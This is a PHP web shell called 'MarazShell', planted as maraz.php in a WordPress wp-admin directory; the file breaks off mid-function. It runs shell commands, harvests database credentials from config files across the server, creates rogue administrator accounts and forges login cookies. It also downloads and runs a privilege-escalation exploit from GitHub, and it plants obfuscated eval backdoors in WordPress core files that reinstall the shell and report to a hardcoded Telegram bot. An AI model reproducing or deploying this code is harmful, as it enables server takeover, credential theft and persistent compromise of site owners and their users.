File: /homepages/4/d4297730999/htdocs/wordpress/wp-admin/maraz.php
<?php
error_reporting(0);
session_start();
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@ini_set('error_log', NULL);
@header('X-Accel-Buffering: no');
@header('Content-Type: text/html; charset=UTF-8');
function encodePath($path) {
return str_replace(["/", "\\", ".", ":"], ["ক", "খ", "গ", "ঘ"], $path);
}
function decodePath($path) {
return str_replace(["ক", "খ", "গ", "ঘ"], ["/", "\\", ".", ":"], $path);
}
if (isset($_GET['wp_login_jump']) && isset($_GET['wp_dir'])) {
$jump_dir = decodePath($_GET['wp_dir']);
if (is_dir($jump_dir)) {
chdir($jump_dir);
if (file_exists('./wp-load.php')) {
define("WP_USE_THEMES", false);
require("./wp-load.php");
$user_id = (int)$_GET['wp_login_jump'];
wp_set_current_user($user_id);
wp_set_auth_cookie($user_id);
header("Location: " . admin_url());
exit;
}
}
}
$spoof_headers = [
'X-Forwarded-For: 127.0.0.1',
'X-Real-IP: 127.0.0.1',
'CF-Connecting-IP: 127.0.0.1',
'True-Client-IP: 127.0.0.1',
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
];
foreach($spoof_headers as $h) @header($h);
@clearstatcache();
@set_time_limit(0);
@ignore_user_abort(true);
@ini_set('max_execution_time', 0);
@ini_set('memory_limit', '-1');
function x_exec($c) {
$r = '';
if (function_exists('shell_exec')) { $r = @shell_exec($c); }
elseif (function_exists('system')) { ob_start(); @system($c); $r = ob_get_clean(); }
elseif (function_exists('passthru')) { ob_start(); @passthru($c); $r = ob_get_clean(); }
elseif (function_exists('exec')) { @exec($c, $o); $r = @implode("\n", $o); }
elseif (is_resource($p = @popen($c, 'r'))) { while (!feof($p)) $r .= fread($p, 1024); pclose($p); }
elseif (function_exists('proc_open')) {
$d = [['pipe', 'r'],['pipe', 'w'],['pipe', 'w']];
$pr = @proc_open($c, $d, $ps);
if (is_resource($pr)) { $r = stream_get_contents($ps[1]); @fclose($ps[0]); @fclose($ps[1]); @fclose($ps[2]); proc_close($pr); }
}
return $r;
}
function root_exec($c) { return x_exec($c); }
function root_exec_system($c) { return x_exec($c); }
function root_write_file($f, $c) { return @file_put_contents($f, $c) !== false; }
function root_log($m) { if(!isset($_SESSION['root_log'])) $_SESSION['root_log']=[]; $_SESSION['root_log'][]=date("[H:i:s] ").$m; }
function wout($m) { echo htmlspecialchars($m) . "\n"; @ob_flush(); flush(); }
function root_find_scan_base() { return realpath($_SERVER['DOCUMENT_ROOT'] ?? getcwd()); }
function check_ext($e) { return extension_loaded($e) ? '<span class="status-on">ON</span>' : '<span class="status-off">OFF</span>'; }
function get_software() { return $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown'; }
function wp_find_paths($limit = 60) {
if(isset($_SESSION['wp_paths_cache']) && !empty($_SESSION['wp_paths_cache'])) return $_SESSION['wp_paths_cache'];
$r = [];
$b = root_find_scan_base();
$targets = ['/var/www', '/home', '/public_html', 'C:\\inetpub\\wwwroot', $b];
foreach($targets as $t) {
if(!@is_dir($t)) continue;
$cmd = "find $t -maxdepth 4 -name 'wp-config.php' 2>/dev/null";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $cmd = "dir /s /b \"$t\\wp-config.php\" 2>nul";
$res = root_exec($cmd);
foreach(explode("\n", trim($res)) as $l) {
if(trim($l) && file_exists(trim($l))) $r[] = dirname(realpath(trim($l)));
}
}
$_SESSION['wp_paths_cache'] = array_unique($r);
return $_SESSION['wp_paths_cache'];
}
function wp_get_db_config($d) {
$f = $d . DIRECTORY_SEPARATOR . 'wp-config.php';
if(!file_exists($f)) return false;
$c = file_get_contents($f);
preg_match("/define\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/i", $c, $m1);
preg_match("/define\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/i", $c, $m2);
preg_match("/define\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]*)['\"]\s*\)/i", $c, $m3);
preg_match("/define\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/i", $c, $m4);
preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]\s*;/i", $c, $m5);
return ['db'=>$m1[1]??'','user'=>$m2[1]??'','pass'=>$m3[1]??'','host'=>$m4[1]??'localhost', 'prefix'=>$m5[1]??'wp_'];
}
function wp_reset_pw($m, $pr, $id, $pw) {
if(empty($pw)) return false;
$hpw = md5($pw);
return $m->query("UPDATE {$pr}users SET user_pass='$hpw' WHERE ID=$id");
}
function wp_add_admin($m, $pr, $u, $p, $e) {
$hp = md5($p);
$res = $m->query("INSERT INTO {$pr}users (user_login, user_pass, user_email, user_registered, user_status) VALUES ('$u', '$hp', '$e', NOW(), 0)");
if(!$res) return false;
$id = $m->insert_id;
$m->query("INSERT INTO {$pr}usermeta (user_id, meta_key, meta_value) VALUES ($id, '{$pr}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')");
$m->query("INSERT INTO {$pr}usermeta (user_id, meta_key, meta_value) VALUES ($id, '{$pr}user_level', '10')");
return true;
}
function wp_delete_user($m, $pr, $id) {
return $m->query("DELETE FROM {$pr}users WHERE ID=$id") && $m->query("DELETE FROM {$pr}usermeta WHERE user_id=$id");
}
function wp_get_version($d) {
$f = $d . DIRECTORY_SEPARATOR . 'wp-includes' . DIRECTORY_SEPARATOR . 'version.php';
if(!file_exists($f)) return '?.?';
$c = file_get_contents($f);
preg_match("/\\\$wp_version\s*=\s*['\"]([^'\"]+)['\"]/i", $c, $m);
return $m[1] ?? '?.?';
}
function wp_fetch_users($m, $pr) {
$r = $m->query("SELECT ID, user_login, user_email FROM {$pr}users LIMIT 50");
$res = [];
if(!$r) return $res;
while($row = $r->fetch_assoc()) {
$meta = $m->query("SELECT meta_value FROM {$pr}usermeta WHERE user_id={$row['ID']} AND meta_key='{$pr}capabilities' LIMIT 1");
$mrow = $meta->fetch_assoc();
$row['role'] = (strpos($mrow['meta_value']??'', 'administrator') !== false) ? 'admin' : 'user';
$res[] = $row;
}
return $res;
}
function wp_toggle_lockdown($wp_dir, $lock) {
$cf = $wp_dir . DIRECTORY_SEPARATOR . 'wp-config.php';
if(!file_exists($cf)) return false;
$c = file_get_contents($cf);
$v = $lock ? 'true' : 'false';
if(strpos($c, 'DISALLOW_FILE_MODS') !== false) {
$c = preg_replace("/define\s*\(\s*['\"]DISALLOW_FILE_MODS['\"]\s*,\s*(true|false)\s*\);/i", "define('DISALLOW_FILE_MODS', $v);", $c);
} else {
$c = str_replace("<?php", "<?php\ndefine('DISALLOW_FILE_MODS', $v);", $c);
}
return @file_put_contents($cf, $c) !== false;
}
function root_smart_download($u, $f) {
$c = @file_get_contents($u);
if($c) return @file_put_contents($f, $c) !== false;
if(function_exists('curl_init')) {
$ch = curl_init($u);
$fp = fopen($f, 'wb');
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
fclose($fp);
return file_exists($f);
}
return false;
}
$pagePasswordEnable = '1';
$username = 'yol';
$password = 'yol';
$telegram_token = '8585391638:AAEPl8iPyVWioco1pknrOIh9UrPIPx8x29c';
$telegram_chatid = '6099023828';
if ($pagePasswordEnable === '1') {
if (isset($_POST['login_action'])) {
if ($_POST['user'] === $username && $_POST['pass'] === $password) {
$_SESSION['authenticated'] = true;
header("Location: ?"); exit;
} else {
$error = "Access Denied: Invalid Credentials";
}
}
if (isset($_GET['logout'])) { session_destroy(); header("Location: ?"); exit; }
if (!isset($_SESSION['authenticated'])) {
?>
<!DOCTYPE html>
<html>
<head>
<title>MarazShell Login</title>
<link href="https://fonts.googleapis.com/css2?family=Outfit:wght@300;400;600&family=JetBrains+Mono&display=swap" rel="stylesheet">
<style>
:root { --bg: #030303; --primary: #0070f3; --accent: #00dfd8; --text: #eaeaea; --border: rgba(255,255,255,0.1); }
body { background: var(--bg); color: var(--text); font-family: 'Outfit', sans-serif; display: flex; align-items: center; justify-content: center; height: 100vh; margin: 0; }
.login-card { background: rgba(255,255,255,0.02); border: 1px solid var(--border); padding: 40px; border-radius: 20px; width: 350px; text-align: center; box-shadow: 0 20px 50px rgba(0,0,0,0.5); backdrop-filter: blur(10px); }
h1 { font-size: 24px; margin-bottom: 30px; letter-spacing: 2px; }
h1 span { color: var(--primary); text-shadow: 0 0 15px var(--primary); }
input { width: 100%; background: rgba(0,0,0,0.3); border: 1px solid var(--border); padding: 12px; border-radius: 8px; color: #fff; margin-bottom: 15px; box-sizing: border-box; font-family: 'JetBrains Mono'; }
button { width: 100%; background: var(--primary); color: #fff; border: none; padding: 12px; border-radius: 8px; font-weight: 600; cursor: pointer; transition: 0.3s; }
button:hover { filter: brightness(1.2); transform: translateY(-2px); }
.error { color: #ff3e3e; font-size: 13px; margin-bottom: 15px; }
</style>
</head>
<body>
<div class="login-card">
<h1>MARAZ<span>SHELL</span></h1>
<?php if(isset($error)) echo "<div class='error'>$error</div>"; ?>
<form method="POST">
<input type="hidden" name="login_action" value="1">
<input type="text" name="user" placeholder="Username" required autofocus>
<input type="password" name="pass" placeholder="Password" required>
<button type="submit">AUTHENTICATE</button>
</form>
</div>
</body>
</html>
<?php
exit;
}
}
function checkAuth($u, $p) {}
function root_scanner_scan($dir, &$results) {
if (!is_dir($dir)) return;
$files = @scandir($dir);
if (!$files) return;
$suspicious_regex = [
'[\r\n;\/\*]+\s*\b(include|require)(_once)?\b[\s\(]*[\'"][^\n\'"]{1,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\:\/\/))',
'\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[\/\*\s]*\(+[\/\*\s]*((\$_(GET|POST|REQUEST|COOKIE)\[.{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*(\$_(GET|POST|REQUEST|COOKIE)\[.{0,25}))'
];
foreach ($files as $file) {
if ($file === '.' || $file === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $file;
if (is_dir($path)) {
root_scanner_scan($path, $results);
} else {
$content = @file_get_contents($path);
if (!$content) continue;
foreach ($suspicious_regex as $regex) {
if (preg_match("/$regex/i", $content, $m)) {
$results[] = [
'path' => $path,
'score' => 100,
'matches' => [$m[0]],
'size' => filesize($path)
];
break;
}
}
}
}
}
function wp_get_lock_status($wp_dir) {
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') return false;
$config_file = $wp_dir . DIRECTORY_SEPARATOR . 'wp-config.php';
if (!file_exists($config_file)) return false;
$content = @file_get_contents($config_file);
if (!$content) return false;
return (preg_match("/define\s*\(\s*['\"]DISALLOW_FILE_MODS['\"]\s*,\s*true\s*\);/i", $content) ? true : false);
}
function get_site_url($mysqli, $prefix) {
if (!$mysqli) return "";
$res = @$mysqli->query("SELECT option_value FROM {$prefix}options WHERE option_name='siteurl' LIMIT 1");
$row = $res ? $res->fetch_assoc() : null;
$url = $row['option_value'] ?? "";
if (!$url) {
$res = @$mysqli->query("SELECT option_value FROM {$prefix}options WHERE option_name='home' LIMIT 1");
$row = $res ? $res->fetch_assoc() : null;
$url = $row['option_value'] ?? "";
}
return rtrim($url, '/');
}
function wp_get_hide_login($mysqli, $prefix) {
if (!$mysqli) return false;
$res = @$mysqli->query("SELECT option_value FROM {$prefix}options WHERE option_name='whl_page' LIMIT 1");
$row = $res ? $res->fetch_assoc() : null;
return $row['option_value'] ?? false;
}
function root_find_all_configs($base_dir) {
$found = [];
$targets = [
'wp-config.php', '.env', 'configuration.php', 'config.php',
'database.php', 'env.php', 'local.xml', 'settings.php'
];
$cmd = "find \"$base_dir\" -maxdepth 10 -type f \( " . implode(" -o ", array_map(function($t){ return "-name '$t'"; }, $targets)) . " \) 2>/dev/null";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$cmd = "dir /s /b " . implode(" ", array_map(function($t) use ($base_dir){ return "\"$base_dir\\$t\""; }, $targets)) . " 2>nul";
}
$res = root_exec($cmd);
foreach(explode("\n", trim($res)) as $path) {
$path = trim($path);
if ($path && @is_file($path)) $found[] = $path;
}
return array_unique($found);
}
function root_extract_creds($file) {
$content = @file_get_contents($file);
if (!$content) return false;
$info = ['file' => $file, 'type' => 'Unknown', 'host' => 'localhost', 'user' => '', 'pass' => '', 'db' => ''];
$base = basename($file);
if ($base == 'wp-config.php') {
$info['type'] = 'WordPress';
preg_match("/define\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $content, $m); $info['db'] = $m[1] ?? '';
preg_match("/define\(\s*'DB_USER'\s*,\s*'([^']+)'/", $content, $m); $info['user'] = $m[1] ?? '';
preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'([^']*)'/", $content, $m); $info['pass'] = $m[1] ?? '';
preg_match("/define\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $content, $m); $info['host'] = $m[1] ?? 'localhost';
} elseif ($base == '.env') {
$info['type'] = 'Laravel/Env';
preg_match("/DB_DATABASE=([^\s]+)/", $content, $m); $info['db'] = trim($m[1], '"\'') ?? '';
preg_match("/DB_USERNAME=([^\s]+)/", $content, $m); $info['user'] = trim($m[1], '"\'') ?? '';
preg_match("/DB_PASSWORD=([^\s]*)/", $content, $m); $info['pass'] = trim($m[1], '"\'') ?? '';
preg_match("/DB_HOST=([^\s]+)/", $content, $m); $info['host'] = trim($m[1], '"\'') ?? 'localhost';
} elseif ($base == 'configuration.php') {
if (strpos($content, 'class JConfig')) $info['type'] = 'Joomla';
elseif (strpos($content, 'WHMCS')) $info['type'] = 'WHMCS';
preg_match("/public \\\$db\s*=\s*'([^']+)';/", $content, $m); $info['db'] = $m[1] ?? '';
preg_match("/public \\\$user\s*=\s*'([^']+)';/", $content, $m); $info['user'] = $m[1] ?? '';
preg_match("/public \\\$password\s*=\s*'([^']*)';/", $content, $m); $info['pass'] = $m[1] ?? '';
preg_match("/public \\\$host\s*=\s*'([^']+)';/", $content, $m); $info['host'] = $m[1] ?? 'localhost';
if (!$info['db']) {
preg_match("/\\\$db_name\s*=\s*['\"]([^'\"]+)['\"];/", $content, $m); $info['db'] = $m[1] ?? '';
preg_match("/\\\$db_username\s*=\s*['\"]([^'\"]+)['\"];/", $content, $m); $info['user'] = $m[1] ?? '';
preg_match("/\\\$db_password\s*=\s*['\"]([^'\"]*)['\"];/", $content, $m); $info['pass'] = $m[1] ?? '';
preg_match("/\\\$db_host\s*=\s*['\"]([^'\"]+)['\"];/", $content, $m); $info['host'] = $m[1] ?? 'localhost';
}
}
return ($info['user'] || $info['db']) ? $info : false;
}
function wp_auto_login($wp_dir, $uid) {
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? "https://" : "http://";
$host = $_SERVER['HTTP_HOST'] ?? 'localhost';
$path = explode('?', $_SERVER['REQUEST_URI'])[0];
return $protocol . $host . $path . "?wp_login_jump=" . (int)$uid . "&wp_dir=" . encodePath($wp_dir);
}
function formatSizeUnits($bytes) {
if ($bytes >= 1073741824) return number_format($bytes / 1073741824, 2) . ' GB';
if ($bytes >= 1048576) return number_format($bytes / 1048576, 2) . ' MB';
if ($bytes >= 1024) return number_format($bytes / 1024, 2) . ' KB';
if ($bytes > 1) return $bytes . ' bytes';
if ($bytes == 1) return $bytes . ' byte';
return '0 bytes';
}
function fileIcon($file, $isDir = false) {
if ($isDir) return '<i class="fas fa-folder text-warning"></i>';
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
$map = [
'php' => 'fab fa-php text-primary',
'html' => 'fab fa-html5 text-danger',
'css' => 'fab fa-css3 text-info',
'js' => 'fab fa-js text-warning',
'py' => 'fab fa-python text-success',
'jpg' => 'far fa-image text-muted',
'jpeg' => 'far fa-image text-muted',
'png' => 'far fa-image text-muted',
'gif' => 'far fa-image text-muted',
'zip' => 'far fa-file-archive text-warning',
'rar' => 'far fa-file-archive text-warning',
'txt' => 'far fa-file-alt text-muted',
'sql' => 'fas fa-database text-info'
];
if ($file == 'error_log') return '<i class="fas fa-bug text-danger"></i>';
if ($file == '.htaccess') return '<i class="fas fa-shield-alt text-secondary"></i>';
return '<i class="' . ($map[$ext] ?? 'far fa-file text-muted') . '"></i>';
}
// Redundant functions removed (moved to top)
$root_path = realpath(__DIR__);
$current_path = $root_path;
if (isset($_GET['p']) && !empty($_GET['p'])) {
$decoded = decodePath($_GET['p']);
if (is_dir($decoded)) {
$current_path = realpath($decoded);
}
} elseif (isset($_GET['q']) && !empty($_GET['q'])) {
$decoded = decodePath($_GET['q']);
if (is_dir($decoded)) {
$current_path = realpath($decoded);
}
}
define("PATH", $current_path);
$ajax_response = null;
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
if (isset($_POST['wp_action'])) {
$wp_dir = $_POST['wp_dir'];
$cfg = wp_get_db_config($wp_dir);
$mysqli = @new mysqli($cfg['host'], $cfg['user'], $cfg['pass'], $cfg['db']);
if ($mysqli->connect_errno) {
$ajax_response = ['status' => 'error', 'message' => "DB Connection error: " . $mysqli->connect_error];
} else {
if ($_POST['wp_action'] == 'reset_pw') {
$uid = intval($_POST['reset_uid']);
$newpw = trim($_POST['newpw']);
if (wp_reset_pw($mysqli, $cfg['prefix'], $uid, $newpw)) {
$ajax_response = ['status' => 'success', 'message' => "Password reset for user ID $uid: $newpw"];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to reset password."];
}
} elseif ($_POST['wp_action'] == 'add_admin') {
$user = trim($_POST['new_user']);
$pass = trim($_POST['new_pass']);
$email = trim($_POST['new_email']);
if (wp_add_admin($mysqli, $cfg['prefix'], $user, $pass, $email)) {
$ajax_response = ['status' => 'success', 'message' => "Admin '$user' added successfully!"];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to add admin."];
}
} elseif ($_POST['wp_action'] == 'delete_user') {
$uid = intval($_POST['uid']);
if (wp_delete_user($mysqli, $cfg['prefix'], $uid)) {
$ajax_response = array('status' => 'success', 'message' => "User ID " . $uid . " deleted.");
} else {
$ajax_response = array('status' => 'error', 'message' => "Failed to delete user.");
}
} elseif ($_POST['wp_action'] == 'toggle_lock') {
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$ajax_response = array('status' => 'error', 'message' => "WP Lockdown is not supported on Windows servers.");
} else {
$lock = ($_POST['lock_val'] == '1');
if (wp_toggle_lockdown($wp_dir, $lock)) {
$ajax_response = array('status' => 'success', 'message' => "WP Security " . ($lock ? "LOCKED" : "UNLOCKED"));
} else {
$ajax_response = array('status' => 'error', 'message' => "Failed to update wp-config.php");
}
}
} elseif ($_POST['wp_action'] == 'auto_login') {
$uid = intval($_POST['uid']);
$login_url = wp_auto_login($wp_dir, $uid);
$ajax_response = ['status' => 'success', 'url' => $login_url];
}
}
if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; }
}
if (isset($_POST['fm_action'])) {
$action = $_POST['fm_action'];
if ($action == 'get_wp_lock_list') {
$wp_list = wp_find_paths(40);
if (empty($wp_list)) {
echo "<p style='font-size: 12px; color: var(--text-dim); text-align: center; padding: 20px;'>No WordPress sites detected auto-scan.</p>";
} else {
foreach ($wp_list as $w_dir) {
$is_l = wp_get_lock_status($w_dir);
$dir_nm = basename($w_dir);
if ($dir_nm == '.' || $dir_nm == '') $dir_nm = "ROOT";
echo "<div style='display: flex; align-items: center; justify-content: space-between; background: rgba(255,255,255,0.03); padding: 12px; border-radius: 8px; margin-bottom: 10px; border: 1px solid rgba(255,255,255,0.05);'>";
echo " <div style='max-width: 200px;'>";
echo " <div style='font-size: 11px; font-weight: bold; color: #fff;'>" . htmlspecialchars($dir_nm) . "</div>";
echo " <div style='font-size: 9px; color: var(--text-dim); overflow: hidden; text-overflow: ellipsis; white-space: nowrap;'>" . htmlspecialchars($w_dir) . "</div>";
echo " </div>";
echo " <button class='btn btn-sm " . ($is_l ? 'btn-primary' : '') . "' style='font-size: 10px; min-width: 110px; " . ($is_l ? 'background:#f44; border-color:#f44;' : 'background:#222;') . "' onclick=\"toggleCentralWPLock('" . addslashes($w_dir) . "', " . ($is_l ? 0 : 1) . ", this)\">";
echo " <i class='fas " . ($is_l ? 'fa-lock' : 'fa-lock-open') . "'></i> " . ($is_l ? 'LOCKED' : 'UNLOCKED');
echo " </button>";
echo "</div>";
}
}
exit;
}
if ($action == 'create_file') {
$name = trim($_POST['name']);
$content = $_POST['content'];
if (!empty($name)) {
if (file_put_contents(PATH . DIRECTORY_SEPARATOR . $name, $content) !== false) {
$ajax_response = ['status' => 'success', 'message' => "File '$name' created."];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to create file."];
}
}
} elseif ($action == 'create_folder') {
$name = trim($_POST['name']);
if (!empty($name)) {
if (mkdir(PATH . DIRECTORY_SEPARATOR . $name)) {
$ajax_response = ['status' => 'success', 'message' => "Folder '$name' created."];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to create folder."];
}
}
}
if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; }
}
if (isset($_POST['db_action'])) {
$host = $_POST['db_host'] ?: 'localhost';
$user = $_POST['db_user'];
$pass = $_POST['db_pass'];
$db = $_POST['db_name'];
$mysqli = @new mysqli($host, $user, $pass, $db);
if ($mysqli->connect_errno) {
$ajax_response = ['status' => 'error', 'message' => "DB Connection error: " . $mysqli->connect_error];
} else {
$action = $_POST['db_action'];
if ($action == 'query') {
$sql = $_POST['sql'];
$res = $mysqli->query($sql);
if ($res === true) {
$ajax_response = ['status' => 'success', 'message' => "Query executed: " . $mysqli->affected_rows . " rows affected."];
} elseif ($res instanceof mysqli_result) {
$data = [];
while ($row = $res->fetch_assoc()) $data[] = $row;
$ajax_response = ['status' => 'success', 'data' => $data, 'count' => count($data)];
} else {
$ajax_response = ['status' => 'error', 'message' => "SQL Error: " . $mysqli->error];
}
} elseif ($action == 'list_tables') {
$res = $mysqli->query("SHOW TABLES");
$tables = [];
$wp_info = null;
if ($res) {
while ($row = $res->fetch_array()) {
$tables[] = $row[0];
}
foreach ($tables as $t) {
if (preg_match('/_options$/', $t)) {
$prefix = str_replace('options', '', $t);
$whl_res = $mysqli->query("SELECT option_value FROM $t WHERE option_name='whl_page' LIMIT 1");
if ($whl_res && $whl_row = $whl_res->fetch_assoc()) {
$wp_info = ['prefix' => $prefix, 'whl' => $whl_row['option_value']];
}
break;
}
}
$ajax_response = ['status' => 'success', 'tables' => $tables, 'wp_info' => $wp_info];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to fetch tables: " . $mysqli->error];
}
} elseif ($action == 'export_sql') {
$res = $mysqli->query("SHOW TABLES");
$dump = "-- Database Export: " . $db . "\n-- Generated by Antigravity DB Manager\n\n";
while($row = $res->fetch_array()) {
$table = $row[0];
$res2 = $mysqli->query("SHOW CREATE TABLE `$table` ");
$row2 = $res2->fetch_array();
$dump .= "\n\n" . $row2[1] . ";\n\n";
$res3 = $mysqli->query("SELECT * FROM `$table` ");
while($row3 = $res3->fetch_assoc()) {
$keys = array_keys($row3);
$vals = array_map([$mysqli, 'real_escape_string'], array_values($row3));
$dump .= "INSERT INTO `$table` (`" . implode("`,`", $keys) . "`) VALUES ('" . implode("','", $vals) . "');\n";
}
}
$filename = "dump_{$db}_" . date("Ymd_His") . ".sql";
if (root_write_file(PATH . DIRECTORY_SEPARATOR . $filename, $dump)) {
$ajax_response = ['status' => 'success', 'message' => "Database exported to $filename"];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to write dump file."];
}
} elseif ($action == 'delete_row') {
$table = $_POST['table'];
$where = $_POST['where'];
if ($mysqli->query("DELETE FROM `$table` WHERE $where LIMIT 1")) {
$ajax_response = ['status' => 'success', 'message' => "Row deleted."];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to delete: " . $mysqli->error];
}
}
}
if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; }
}
if (isset($_POST['upload'])) {
$target = PATH . DIRECTORY_SEPARATOR . basename($_FILES["fileToUpload"]["name"]);
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target)) {
header("Location: ?p=" . encodePath(PATH)); exit;
}
}
if (isset($_POST['rename'])) {
$old = PATH . DIRECTORY_SEPARATOR . $_GET['r'];
$new = PATH . DIRECTORY_SEPARATOR . $_POST['new_name'];
if (rename($old, $new)) { header("Location: ?p=" . encodePath(PATH)); exit; }
}
if (isset($_POST['edit'])) {
$file = PATH . DIRECTORY_SEPARATOR . $_GET['e'];
if (file_put_contents($file, $_POST['content']) !== false) { header("Location: ?p=" . encodePath(PATH)); exit; }
}
if (isset($_POST['save_settings'])) {
$c = file_get_contents(__FILE__);
$new_enable = $_POST['login_enable'] === '1' ? '1' : '0';
$new_user = $_POST['login_user'];
$new_pass = $_POST['login_pass'];
$c = preg_replace('/\$pagePasswordEnable\s*=\s*\'[01]\';/', "\$pagePasswordEnable = '$new_enable';", $c);
$c = preg_replace('/\$username\s*=\s*\'[^\']*\';/', "\$username = '$new_user';", $c);
$c = preg_replace('/\$password\s*=\s*\'[^\']*\';/', "\$password = '$new_pass';", $c);
$c = preg_replace('/\$telegram_token\s*=\s*\'[^\']*\';/', "\$telegram_token = '" . $_POST['tg_token'] . "';", $c);
$c = preg_replace('/\$telegram_chatid\s*=\s*\'[^\']*\';/', "\$telegram_chatid = '" . $_POST['tg_chatid'] . "';", $c);
if (file_put_contents(__FILE__, $c)) {
$ajax_response = ['status' => 'success', 'message' => "Settings saved. Please refresh."];
} else {
$ajax_response = ['status' => 'error', 'message' => "Failed to write to file."];
}
if (isset($_GET['ajax'])) { header('Content-Type: application/json'); echo json_encode($ajax_response); exit; }
}
if (isset($_POST['action']) && $_POST['action'] == 'auto_root') {
root_log("[*] [CVE-2025-27591] Privilege Escalation motoru başlatıldı...");
$has_below = trim(root_exec("which below 2>/dev/null"));
$log_dir_exists = trim(root_exec("[ -d /var/log/below ] && echo '1' || echo '0'"));
if (!$has_below) {
root_log("[!] TEŞHİS: 'below' binary'si bulunamadı. Exploit muhtemelen başarısız olacak.");
}
if ($log_dir_exists === '0') {
root_log("[!] TEŞHİS: /var/log/below dizini mevcut değil.");
}
$exploit_url = "https://raw.githubusercontent.com/dollarboysushil/Linux-Privilege-Escalation-CVE-2025-27591/refs/heads/main/dbs_exploit.py";
$tmp_py = './.dbs_exploit.py';
root_log("[*] Exploit indiriliyor: $exploit_url");
if (root_smart_download($exploit_url, $tmp_py)) {
root_log("[+] Exploit indirildi. Çalıştırılıyor...");
$output = root_exec("python3 $tmp_py 2>&1 || python $tmp_py 2>&1");
foreach(explode("\n", $output) as $line) {
if(trim($line)) {
$l = trim($line);
root_log("[PY] " . $l);
}
}
@unlink($tmp_py);
$check = root_exec("grep 'dollarboysushil' /etc/passwd");
if (strpos($check, 'dollarboysushil') !== false) {
root_log("[SUCCESS] Exploit BAŞARILI! Kullanıcı: dollarboysushil");
} else {
root_log("[!] Exploit tamamlandı. Sistem bu açığa karşı yamalı veya 'below' konfigürasyonu uyumsuz.");
if (!$has_below) root_log("[?] İpucu: Sistemde 'below' yüklü değil, başka bir exploit deneyin.");
}
} else {
root_log("[!!] Hata: Exploit dosyası indirilemedi.");
}
header("Location: ?linr00t"); exit;
}
if (isset($_POST['wp_deep_persistence'])) {
$shell_name = basename(__FILE__);
$shell_content = @file_get_contents(__FILE__);
$compressed = base64_encode(gzcompress($shell_content, 9));
$tg_t = $telegram_token;
$tg_c = $telegram_chatid;
$guard_raw = '
$f = "' . $shell_name . '";
$p = "' . $compressed . '";
$t = "' . $tg_t . '";
$c = "' . $tg_c . '";
$root = dirname(__FILE__, 2);
if(!file_exists($root."/$f") && !isset($GLOBALS["guard_run"])){
$GLOBALS["guard_run"] = 1;
$targets = array($root);
$choices = array("wp-includes", "wp-content", "wp-content/plugins", "wp-content/themes", "wp-content/uploads");
foreach($choices as $dir) if(@is_dir($root."/".$dir)) $targets[] = $root."/".$dir;
shuffle($targets);
$chosen = array_slice($targets, 0, 3);
$found_urls = array();
foreach($chosen as $t_dir){
$dest = $t_dir . DIRECTORY_SEPARATOR . $f;
if(@file_put_contents($dest, gzuncompress(base64_decode($p)))){
$u = (empty($_SERVER["HTTPS"]) ? "http" : "https") . "://" . $_SERVER["HTTP_HOST"] . str_replace(array($root, "\\"), array("", "/"), $dest);
$found_urls[] = $u;
}
}
if(!empty($found_urls)){
$m = "<b>[DEEP-GUARD] Multi-Restore Success!</b>\nHost: " . $_SERVER["HTTP_HOST"] . "\nURLs:\n" . implode("\n", $found_urls);
@file_get_contents("https://api.telegram.org/bot$t/sendMessage?chat_id=$c&parse_mode=HTML&text=".urlencode($m));
}
}';
$obfuscated_guard = '<?php /* WP-Core-Optimization */ eval(gzuncompress(base64_decode("' . base64_encode(gzcompress($guard_raw, 9)) . '"))); ';
$scan_root = root_find_scan_base();
$wp_dirs = [];
try {
if (class_exists("RecursiveDirectoryIterator")) {
$it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($scan_root, RecursiveDirectoryIterator::SKIP_DOTS));
foreach($it as $f) {
if($f->getFilename() == "wp-config.php") $wp_dirs[] = $f->getPath();
}
}
} catch(Exception $e) {}
$injected_files = [];
$deep_targets = ["wp-includes/capabilities.php", "wp-includes/plugin.php", "wp-includes/post.php", "wp-includes/formatting.php", "wp-includes/class-wp-hook.php"];
foreach($wp_dirs as $wd) {
